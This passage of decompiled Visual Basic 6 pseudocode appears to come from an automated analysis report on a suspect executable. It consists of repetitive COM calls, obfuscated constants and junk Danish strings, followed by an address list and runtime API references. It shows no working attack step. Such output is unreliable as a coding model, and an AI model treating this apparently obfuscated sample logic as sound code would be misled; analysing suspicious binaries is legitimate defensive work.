                  					_push(_v276);
                  					_push(_v280);
                  					L004013D8();
                  					_v408 = _t834;
                  				}
                  				if( *0x410010 != 0) {
                  					_v412 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v412 = 0x410010;
                  				}
                  				_t1178 =  *((intOrPtr*)( *_v412));
                  				_t838 =  &_v112;
                  				L004013CC();
                  				_v284 = _t838;
                  				_t842 =  *((intOrPtr*)( *_v284 + 0xe8))(_v284,  &_v232, _t838,  *((intOrPtr*)(_t1178 + 0x31c))( *_v412));
                  				asm("fclex");
                  				_v288 = _t842;
                  				if(_v288 >= 0) {
                  					_v416 = _v416 & 0x00000000;
                  				} else {
                  					_push(0xe8);
                  					_push(0x40b07c);
                  					_push(_v284);
                  					_push(_v288);
                  					L004013D8();
                  					_v416 = _t842;
                  				}
                  				_v344 = _v96;
                  				_v96 = _v96 & 0x00000000;
                  				_v128 = _v344;
                  				_v136 = 8;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *_t1289 =  *0x4011c0;
                  				_t848 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, _v92, _t1178, _t1178, 0x10, 0x514f93, _v232);
                  				_v292 = _t848;
                  				if(_v292 >= 0) {
                  					_v420 = _v420 & 0x00000000;
                  				} else {
                  					_push(0x6fc);
                  					_push(0x40ad54);
                  					_push(_a4);
                  					_push(_v292);
                  					L004013D8();
                  					_v420 = _t848;
                  				}
                  				L00401462();
                  				_push( &_v112);
                  				_push( &_v108);
                  				_push( &_v104);
                  				_push(3);
                  				L004013C6();
                  				_t1290 = _t1289 + 0x10;
                  				L00401450();
                  				if( *0x410010 != 0) {
                  					_v424 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v424 = 0x410010;
                  				}
                  				_t855 =  &_v104;
                  				L004013CC();
                  				_v268 = _t855;
                  				_t859 =  *((intOrPtr*)( *_v268 + 0xf0))(_v268,  &_v108, _t855,  *((intOrPtr*)( *((intOrPtr*)( *_v424)) + 0x314))( *_v424));
                  				asm("fclex");
                  				_v272 = _t859;
                  				if(_v272 >= 0) {
                  					_v428 = _v428 & 0x00000000;
                  				} else {
                  					_push(0xf0);
                  					_push(0x40b06c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v428 = _t859;
                  				}
                  				if( *0x410010 != 0) {
                  					_v432 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v432 = 0x410010;
                  				}
                  				_t863 =  &_v112;
                  				L004013CC();
                  				_v276 = _t863;
                  				_t867 =  *((intOrPtr*)( *_v276 + 0x48))(_v276,  &_v92, _t863,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x31c))( *_v432));
                  				asm("fclex");
                  				_v280 = _t867;
                  				if(_v280 >= 0) {
                  					_v436 = _v436 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b07c);
                  					_push(_v276);
                  					_push(_v280);
                  					L004013D8();
                  					_v436 = _t867;
                  				}
                  				if( *0x410010 != 0) {
                  					_v440 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v440 = 0x410010;
                  				}
                  				_t871 =  &_v116;
                  				L004013CC();
                  				_v284 = _t871;
                  				_t875 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v220, _t871,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x300))( *_v440));
                  				asm("fclex");
                  				_v288 = _t875;
                  				if(_v288 >= 0) {
                  					_v444 = _v444 & 0x00000000;
                  				} else {
                  					_push(0x128);
                  					_push(0x40b05c);
                  					_push(_v284);
                  					_push(_v288);
                  					L004013D8();
                  					_v444 = _t875;
                  				}
                  				if( *0x410010 != 0) {
                  					_v448 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v448 = 0x410010;
                  				}
                  				_t1192 =  *((intOrPtr*)( *_v448));
                  				_t879 =  &_v120;
                  				L004013CC();
                  				_v292 = _t879;
                  				_t883 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t879,  *((intOrPtr*)(_t1192 + 0x300))( *_v448));
                  				asm("fclex");
                  				_v296 = _t883;
                  				if(_v296 >= 0) {
                  					_v452 = _v452 & 0x00000000;
                  				} else {
                  					_push(0x1dc);
                  					_push(0x40b05c);
                  					_push(_v292);
                  					_push(_v296);
                  					L004013D8();
                  					_v452 = _t883;
                  				}
                  				_v348 = _v96;
                  				_v96 = _v96 & 0x00000000;
                  				_v160 = _v348;
                  				_v168 = 8;
                  				_v176 = 0x5a42e0;
                  				_v184 = 3;
                  				_v232 = 0x3554e3;
                  				_v228 = 0x17dd;
                  				_v224 = _v220;
                  				_v352 = _v92;
                  				_v92 = _v92 & 0x00000000;
                  				_v144 = _v352;
                  				_v152 = 8;
                  				_v356 = _v108;
                  				_v108 = _v108 & 0x00000000;
                  				_v128 = _v356;
                  				_v136 = 9;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_v240 =  *0x4011bc;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *((intOrPtr*)( *_a4 + 0x71c))(_a4,  &_v136, 0x10,  &_v224, _t1192,  &_v228, L"Underbevidsthed",  &_v232, 0x10,  &_v168);
                  				L004013C6();
                  				L00401432();
                  				_t1292 = _t1290 + 0x24;
                  				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v136, 3,  &_v136,  &_v152,  &_v168, 4,  &_v104,  &_v112,  &_v116,  &_v120);
                  				L004013C0();
                  				if( *0x410010 != 0) {
                  					_v456 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v456 = 0x410010;
                  				}
                  				_t1196 =  *((intOrPtr*)( *_v456));
                  				_t915 =  &_v104;
                  				L004013CC();
                  				_v268 = _t915;
                  				_t919 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t915,  *((intOrPtr*)(_t1196 + 0x304))( *_v456));
                  				asm("fclex");
                  				_v272 = _t919;
                  				if(_v272 >= 0) {
                  					_v460 = _v460 & 0x00000000;
                  				} else {
                  					_push(0x48);
                  					_push(0x40b05c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v460 = _t919;
                  				}
                  				_v192 = 0x7cf5f3;
                  				_v200 = 3;
                  				_v220 = 0x74c1;
                  				_v176 = L"overstiges";
                  				_v184 = 8;
                  				_v360 = _v92;
                  				_v92 = _v92 & 0x00000000;
                  				_v128 = _v360;
                  				_v136 = 8;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				 *_t1292 =  *0x4011b8;
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				L004012A0();
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				asm("movsd");
                  				_t929 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x10, 0x10, _t1196,  &_v220, 0x39ff, 0x10, 0x667a4db0, 0x5b07,  &_v256);
                  				_v276 = _t929;
                  				if(_v276 >= 0) {
                  					_v464 = _v464 & 0x00000000;
                  				} else {
                  					_push(0x700);
                  					_push(0x40ad54);
                  					_push(_a4);
                  					_push(_v276);
                  					L004013D8();
                  					_v464 = _t929;
                  				}
                  				_v88 = _v256;
                  				L004013D2();
                  				L00401450();
                  				if( *0x410010 != 0) {
                  					_v468 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v468 = 0x410010;
                  				}
                  				_t933 =  &_v104;
                  				L004013CC();
                  				_v268 = _t933;
                  				_t937 =  *((intOrPtr*)( *_v268 + 0xa0))(_v268,  &_v220, _t933,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x314))( *_v468));
                  				asm("fclex");
                  				_v272 = _t937;
                  				if(_v272 >= 0) {
                  					_v472 = _v472 & 0x00000000;
                  				} else {
                  					_push(0xa0);
                  					_push(0x40b06c);
                  					_push(_v268);
                  					_push(_v272);
                  					L004013D8();
                  					_v472 = _t937;
                  				}
                  				if( *0x410010 != 0) {
                  					_v476 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v476 = 0x410010;
                  				}
                  				_t941 =  &_v108;
                  				L004013CC();
                  				_v276 = _t941;
                  				_t945 =  *((intOrPtr*)( *_v276 + 0x1a0))(_v276,  &_v224, _t941,  *((intOrPtr*)( *((intOrPtr*)( *_v476)) + 0x304))( *_v476));
                  				asm("fclex");
                  				_v280 = _t945;
                  				if(_v280 >= 0) {
                  					_v480 = _v480 & 0x00000000;
                  				} else {
                  					_push(0x1a0);
                  					_push(0x40b05c);
                  					_push(_v276);
                  					_push(_v280);
                  					L004013D8();
                  					_v480 = _t945;
                  				}
                  				if( *0x410010 != 0) {
                  					_v484 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v484 = 0x410010;
                  				}
                  				_t949 =  &_v112;
                  				L004013CC();
                  				_v284 = _t949;
                  				_t953 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v232, _t949,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x318))( *_v484));
                  				asm("fclex");
                  				_v288 = _t953;
                  				if(_v288 >= 0) {
                  					_v488 = _v488 & 0x00000000;
                  				} else {
                  					_push(0x128);
                  					_push(0x40b06c);
                  					_push(_v284);
                  					_push(_v288);
                  					L004013D8();
                  					_v488 = _t953;
                  				}
                  				if( *0x410010 != 0) {
                  					_v492 = 0x410010;
                  				} else {
                  					_push("P�t");
                  					_push(0x40a4a4);
                  					L004013DE();
                  					_v492 = 0x410010;
                  				}
                  				_t1210 =  *((intOrPtr*)( *_v492));
                  				_t957 =  &_v116;
                  				L004013CC();
                  				_v292 = _t957;
                  				_t961 =  *((intOrPtr*)( *_v292 + 0xf0))(_v292,  &_v120, _t957,  *((intOrPtr*)(_t1210 + 0x318))( *_v492));
                  				asm("fclex");
                  				_v296 = _t961;
                  				if(_v296 >= 0) {
                  					_v496 = _v496 & 0x00000000;
                  				} else {
                  					_push(0xf0);
                  					_push(0x40b06c);
                  					_push(_v292);
                  					_push(_v296);
                  					L004013D8();
                  					_v496 = _t961;
                  				}
                  				L004013BA();
                  				_t1293 = _t1292 + 0x10;
                  				_t963 =  &_v136;
                  				L004013B4();
                  				_v240 = _t963;
                  				_v236 = 0x6b5bc3;
                  				_v256 =  *0x4011b0;
                  				_v412 =  *0x4011a8;
                  				_t969 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x31f0, _v220, _v224,  &_v236, _v232, _t1210, _t1210,  &_v240, 0x60d, 0x5cfc, _t963,  &_v136, _v120, 0, 0);
                  				_v300 = _t969;
                  				if(_v300 >= 0) {
                  					_v500 = _v500 & 0x00000000;
                  				} else {
                  					_push(0x704);
                  					_push(0x40ad54);
                  					_push(_a4);
                  					_push(_v300);
                  					L004013D8();
                  					_v500 = _t969;
                  				}
                  				L004013C6();
                  				_t1294 = _t1293 + 0x18;
                  				L00401450();
                  				_t977 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 5,  &_v104,  &_v108,  &_v112,  &_v116,  &_v120);
                  				asm("fclex");
                  				_v268 = _t977;
                  				if(_v268 >= 0) {
                  					_v504 = _v504 & 0x00000000;
                  				} else {
                  					_push(0x2b4);
                  					_push(0x40ad24);
                  					_push(_a4);
                  					_push(_v268);
                  					L004013D8();
                  					_v504 = _t977;
                  				}
                  				_v176 = 1;
                  				_v184 = 2;
                  				_v192 = 0x5f7a;
                  				_v200 = 2;
                  				_v208 = _v208 & 0x00000000;
                  				_v216 = 2;
                  				_push( &_v184);
                  				_push( &_v200);
                  				_push( &_v216);
                  				_push( &_v332);
                  				_push( &_v316);
                  				_t983 =  &_v40;
                  				_push(_t983);
                  				L004013AE();
                  				_v364 = _t983;
                  				while(_v364 != 0) {
                  					_v176 = L"RRETS";
                  					_v184 = 8;
                  					L004013E4();
                  					_v264 =  *0x4011a0;
                  					_v256 = 0x418e7d50;
                  					_v252 = 0x5af3;
                  					_t989 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v256, 0x4d7a,  &_v264, 0x6e4acb,  &_v136);
                  					_v268 = _t989;
                  					if(_v268 >= 0) {
                  						_v508 = _v508 & 0x00000000;
                  					} else {
                  						_push(0x708);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v268);
                  						L004013D8();
                  						_v508 = _t989;
                  					}
                  					L00401450();
                  					if( *0x410010 != 0) {
                  						_v512 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v512 = 0x410010;
                  					}
                  					_t993 =  &_v104;
                  					L004013CC();
                  					_v268 = _t993;
                  					_t997 =  *((intOrPtr*)( *_v268 + 0x68))(_v268,  &_v232, _t993,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x314))( *_v512));
                  					asm("fclex");
                  					_v272 = _t997;
                  					if(_v272 >= 0) {
                  						_v516 = _v516 & 0x00000000;
                  					} else {
                  						_push(0x68);
                  						_push(0x40b06c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v516 = _t997;
                  					}
                  					if( *0x410010 != 0) {
                  						_v520 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v520 = 0x410010;
                  					}
                  					_t1001 =  &_v108;
                  					L004013CC();
                  					_v276 = _t1001;
                  					_t1005 =  *((intOrPtr*)( *_v276 + 0x90))(_v276,  &_v220, _t1001,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x31c))( *_v520));
                  					asm("fclex");
                  					_v280 = _t1005;
                  					if(_v280 >= 0) {
                  						_v524 = _v524 & 0x00000000;
                  					} else {
                  						_push(0x90);
                  						_push(0x40b07c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v524 = _t1005;
                  					}
                  					if( *0x410010 != 0) {
                  						_v528 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v528 = 0x410010;
                  					}
                  					_t1009 =  &_v112;
                  					L004013CC();
                  					_v284 = _t1009;
                  					_t1013 =  *((intOrPtr*)( *_v284 + 0xf8))(_v284,  &_v92, _t1009,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x308))( *_v528));
                  					asm("fclex");
                  					_v288 = _t1013;
                  					if(_v288 >= 0) {
                  						_v532 = _v532 & 0x00000000;
                  					} else {
                  						_push(0xf8);
                  						_push(0x40b05c);
                  						_push(_v284);
                  						_push(_v288);
                  						L004013D8();
                  						_v532 = _t1013;
                  					}
                  					if( *0x410010 != 0) {
                  						_v536 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v536 = 0x410010;
                  					}
                  					_t1017 =  &_v116;
                  					L004013CC();
                  					_v292 = _t1017;
                  					_t1021 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t1017,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
                  					asm("fclex");
                  					_v296 = _t1021;
                  					if(_v296 >= 0) {
                  						_v540 = _v540 & 0x00000000;
                  					} else {
                  						_push(0x1dc);
                  						_push(0x40b05c);
                  						_push(_v292);
                  						_push(_v296);
                  						L004013D8();
                  						_v540 = _t1021;
                  					}
                  					_v144 = 0x85aaa;
                  					_v152 = 3;
                  					_v192 = 0x791fc7;
                  					_v200 = 3;
                  					_v368 = _v96;
                  					_v96 = _v96 & 0x00000000;
                  					_v128 = _v368;
                  					_v136 = 8;
                  					_v240 =  *0x401198;
                  					_v372 = _v92;
                  					_v92 = _v92 & 0x00000000;
                  					L0040145C();
                  					_v256 =  *0x401190;
                  					_v236 = _v232;
                  					_v176 = 0x51ddc9;
                  					_v184 = 3;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					_v592 =  *0x401188;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x10,  &_v236, _v220,  &_v256,  &_v100,  &_v100,  &_v240,  &_v136, 0x10,  &_v152);
                  					L00401462();
                  					_push( &_v116);
                  					_push( &_v112);
                  					_push( &_v108);
                  					_push( &_v104);
                  					_push(4);
                  					L004013C6();
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push(2);
                  					L00401432();
                  					_t1296 = _t1294 + 0x20;
                  					if( *0x410010 != 0) {
                  						_v544 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v544 = 0x410010;
                  					}
                  					_t1046 =  &_v104;
                  					L004013CC();
                  					_v268 = _t1046;
                  					_t1050 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t1046,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x308))( *_v544));
                  					asm("fclex");
                  					_v272 = _t1050;
                  					if(_v272 >= 0) {
                  						_v548 = _v548 & 0x00000000;
                  					} else {
                  						_push(0x48);
                  						_push(0x40b05c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v548 = _t1050;
                  					}
                  					if( *0x410010 != 0) {
                  						_v552 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v552 = 0x410010;
                  					}
                  					_t1054 =  &_v108;
                  					L004013CC();
                  					_v276 = _t1054;
                  					_t1058 =  *((intOrPtr*)( *_v276 + 0xe8))(_v276,  &_v220, _t1054,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x318))( *_v552));
                  					asm("fclex");
                  					_v280 = _t1058;
                  					if(_v280 >= 0) {
                  						_v556 = _v556 & 0x00000000;
                  					} else {
                  						_push(0xe8);
                  						_push(0x40b06c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v556 = _t1058;
                  					}
                  					if( *0x410010 != 0) {
                  						_v560 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v560 = 0x410010;
                  					}
                  					_t1062 =  &_v112;
                  					L004013CC();
                  					_v284 = _t1062;
                  					_t1066 =  *((intOrPtr*)( *_v284 + 0x58))(_v284,  &_v116, _t1062,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x31c))( *_v560));
                  					asm("fclex");
                  					_v288 = _t1066;
                  					if(_v288 >= 0) {
                  						_v564 = _v564 & 0x00000000;
                  					} else {
                  						_push(0x58);
                  						_push(0x40b07c);
                  						_push(_v284);
                  						_push(_v288);
                  						L004013D8();
                  						_v564 = _t1066;
                  					}
                  					_push(0);
                  					_push(0);
                  					_push(_v116);
                  					_push( &_v152);
                  					L004013BA();
                  					_t1297 = _t1296 + 0x10;
                  					if( *0x410010 != 0) {
                  						_v568 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v568 = 0x410010;
                  					}
                  					_t1239 =  *((intOrPtr*)( *_v568));
                  					_t1071 =  &_v120;
                  					L004013CC();
                  					_v292 = _t1071;
                  					_t1075 =  *((intOrPtr*)( *_v292 + 0x60))(_v292,  &_v232, _t1071,  *((intOrPtr*)(_t1239 + 0x314))( *_v568));
                  					asm("fclex");
                  					_v296 = _t1075;
                  					if(_v296 >= 0) {
                  						_v572 = _v572 & 0x00000000;
                  					} else {
                  						_push(0x60);
                  						_push(0x40b06c);
                  						_push(_v292);
                  						_push(_v296);
                  						L004013D8();
                  						_v572 = _t1075;
                  					}
                  					_v240 = _v232;
                  					_t1077 =  &_v152;
                  					L004013B4();
                  					_v236 = _t1077;
                  					_v376 = _v92;
                  					_v92 = _v92 & 0x00000000;
                  					_v128 = _v376;
                  					_v136 = 8;
                  					_v264 =  *0x401180;
                  					_v256 = 0x754c8ed0;
                  					_v252 = 0x5afc;
                  					 *_t1297 =  *0x401178;
                  					_t1088 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x2e2313c0, 0x5af8,  &_v256,  &_v264,  &_v136, 0x683d, _v220,  &_v236, _t1239, _t1239,  &_v240,  &_v244, _t1077);
                  					_v300 = _t1088;
                  					if(_v300 >= 0) {
                  						_v576 = _v576 & 0x00000000;
                  					} else {
                  						_push(0x70c);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v300);
                  						L004013D8();
                  						_v576 = _t1088;
                  					}
                  					_v80 = _v244;
                  					_push( &_v116);
                  					_push( &_v120);
                  					_push( &_v112);
                  					_push( &_v108);
                  					_push( &_v104);
                  					_push(5);
                  					L004013C6();
                  					_push( &_v152);
                  					_push( &_v136);
                  					_push(2);
                  					L00401432();
                  					_t1299 = _t1297 + 0x24;
                  					if( *0x410010 != 0) {
                  						_v580 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v580 = 0x410010;
                  					}
                  					_t1100 =  &_v104;
                  					L004013CC();
                  					_v268 = _t1100;
                  					_t1104 =  *((intOrPtr*)( *_v268 + 0x170))(_v268,  &_v108, _t1100,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x304))( *_v580));
                  					asm("fclex");
                  					_v272 = _t1104;
                  					if(_v272 >= 0) {
                  						_v584 = _v584 & 0x00000000;
                  					} else {
                  						_push(0x170);
                  						_push(0x40b05c);
                  						_push(_v268);
                  						_push(_v272);
                  						L004013D8();
                  						_v584 = _t1104;
                  					}
                  					if( *0x410010 != 0) {
                  						_v588 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v588 = 0x410010;
                  					}
                  					_t1108 =  &_v112;
                  					L004013CC();
                  					_v276 = _t1108;
                  					_t1112 =  *((intOrPtr*)( *_v276 + 0x110))(_v276,  &_v232, _t1108,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x318))( *_v588));
                  					asm("fclex");
                  					_v280 = _t1112;
                  					if(_v280 >= 0) {
                  						_v592 = _v592 & 0x00000000;
                  					} else {
                  						_push(0x110);
                  						_push(0x40b06c);
                  						_push(_v276);
                  						_push(_v280);
                  						L004013D8();
                  						_v592 = _t1112;
                  					}
                  					if( *0x410010 != 0) {
                  						_v596 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v596 = 0x410010;
                  					}
                  					_t1116 =  &_v116;
                  					L004013CC();
                  					_v284 = _t1116;
                  					_t1120 =  *((intOrPtr*)( *_v284 + 0x70))(_v284,  &_v236, _t1116,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x318))( *_v596));
                  					asm("fclex");
                  					_v288 = _t1120;
                  					if(_v288 >= 0) {
                  						_v600 = _v600 & 0x00000000;
                  					} else {
                  						_push(0x70);
                  						_push(0x40b06c);
                  						_push(_v284);
                  						_push(_v288);
                  						L004013D8();
                  						_v600 = _t1120;
                  					}
                  					if( *0x410010 != 0) {
                  						_v604 = 0x410010;
                  					} else {
                  						_push("P�t");
                  						_push(0x40a4a4);
                  						L004013DE();
                  						_v604 = 0x410010;
                  					}
                  					_t1251 =  *((intOrPtr*)( *_v604));
                  					_t1124 =  &_v120;
                  					L004013CC();
                  					_v292 = _t1124;
                  					_t1128 =  *((intOrPtr*)( *_v292 + 0x128))(_v292,  &_v240, _t1124,  *((intOrPtr*)(_t1251 + 0x318))( *_v604));
                  					asm("fclex");
                  					_v296 = _t1128;
                  					if(_v296 >= 0) {
                  						_v608 = _v608 & 0x00000000;
                  					} else {
                  						_push(0x128);
                  						_push(0x40b06c);
                  						_push(_v292);
                  						_push(_v296);
                  						L004013D8();
                  						_v608 = _t1128;
                  					}
                  					_v248 = _v240;
                  					_v244 =  *0x401170;
                  					_v176 = _v232;
                  					_v184 = 3;
                  					_v380 = _v108;
                  					_v108 = _v108 & 0x00000000;
                  					_v128 = _v380;
                  					_v136 = 9;
                  					 *_t1299 = _v236;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					 *_t1299 =  *0x40116c;
                  					L004012A0();
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					asm("movsd");
                  					 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x10, 0x5d72, _t1251, 0x10,  &_v244, _t1251,  &_v248);
                  					L004013C6();
                  					_t1294 = _t1299 + 0x14;
                  					L00401450();
                  					_t1147 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v136, 4,  &_v104,  &_v112,  &_v116,  &_v120);
                  					_v268 = _t1147;
                  					if(_v268 >= 0) {
                  						_v612 = _v612 & 0x00000000;
                  					} else {
                  						_push(0x710);
                  						_push(0x40ad54);
                  						_push(_a4);
                  						_push(_v268);
                  						L004013D8();
                  						_v612 = _t1147;
                  					}
                  					L004013C0();
                  					_push( &_v332);
                  					_push( &_v316);
                  					_t1150 =  &_v40;
                  					_push(_t1150);
                  					L004013A8();
                  					_v364 = _t1150;
                  				}
                  				 *((intOrPtr*)( *_a4 + 0x714))(_a4);
                  				_v8 = 0;
                  				asm("wait");
                  				_push(E0040DB73);
                  				_push( &_v332);
                  				_t1155 =  &_v316;
                  				_push(_t1155);
                  				_push(2);
                  				L00401432();
                  				L00401450();
                  				L00401450();
                  				L00401450();
                  				return _t1155;
                  			}
                  0x0040d83d
                  0x0040d842
                  0x0040d842
                  0x0040d872
                  0x0040d876
                  0x0040d87b
                  0x0040d896
                  0x0040d899
                  0x0040d89b
                  0x0040d8a8
                  0x0040d8ca
                  0x0040d8aa
                  0x0040d8aa
                  0x0040d8ac
                  0x0040d8b1
                  0x0040d8b7
                  0x0040d8bd
                  0x0040d8c2
                  0x0040d8c2
                  0x0040d8d8
                  0x0040d8f5
                  0x0040d8da
                  0x0040d8da
                  0x0040d8df
                  0x0040d8e4
                  0x0040d8e9
                  0x0040d8e9
                  0x0040d90f
                  0x0040d919
                  0x0040d91d
                  0x0040d922
                  0x0040d93d
                  0x0040d943
                  0x0040d945
                  0x0040d952
                  0x0040d977
                  0x0040d954
                  0x0040d954
                  0x0040d959
                  0x0040d95e
                  0x0040d964
                  0x0040d96a
                  0x0040d96f
                  0x0040d96f
                  0x0040d984
                  0x0040d990
                  0x0040d99c
                  0x0040d9a2
                  0x0040d9af
                  0x0040d9b5
                  0x0040d9bf
                  0x0040d9c2
                  0x0040d9da
                  0x0040d9e7
                  0x0040d9f4
                  0x0040d9f5
                  0x0040d9f6
                  0x0040d9f7
                  0x0040d9ff
                  0x0040da0a
                  0x0040da17
                  0x0040da18
                  0x0040da19
                  0x0040da1a
                  0x0040da23
                  0x0040da3b
                  0x0040da40
                  0x0040da49
                  0x0040da5d
                  0x0040da63
                  0x0040da70
                  0x0040da92
                  0x0040da72
                  0x0040da72
                  0x0040da77
                  0x0040da7c
                  0x0040da7f
                  0x0040da85
                  0x0040da8a
                  0x0040da8a
                  0x0040daa2
                  0x0040daad
                  0x0040dab4
                  0x0040dab5
                  0x0040dab8
                  0x0040dab9
                  0x0040dabe
                  0x0040dabe
                  0x0040dad9
                  0x0040dadf
                  0x0040dae6
                  0x0040dae7
                  0x0040db48
                  0x0040db49
                  0x0040db4f
                  0x0040db50
                  0x0040db52
                  0x0040db5d
                  0x0040db65
                  0x0040db6d
                  0x0040db72

                  APIs
                  • __vbaChkstk.MSVBVM60(?,004012A6), ref: 0040BFE8
                  • __vbaVarDup.MSVBVM60 ref: 0040C037
                  • #543.MSVBVM60(?,?), ref: 0040C04A
                  • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040C071
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040C08D
                  • __vbaNew2.MSVBVM60(0040B03C,004103C4,?,?,004012A6), ref: 0040C0B7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B02C,0000001C), ref: 0040C119
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B04C,00000064), ref: 0040C174
                  • __vbaFreeObj.MSVBVM60(00000000,?,0040B04C,00000064), ref: 0040C196
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt,?,?,004012A6), ref: 0040C1AE
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C1E7
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B05C,00000048), ref: 0040C22B
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C252
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C28B
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B06C,00000048), ref: 0040C2CF
                  • __vbaNew2.MSVBVM60(0040A4A4,Pt), ref: 0040C2F6
                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040C32F
                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B07C,000000E8), ref: 0040C37C
                  • __vbaChkstk.MSVBVM60(00514F93,?), ref: 0040C3BE
                  • __vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AD54,000006FC,?,?,00514F93,?), ref: 0040C40D
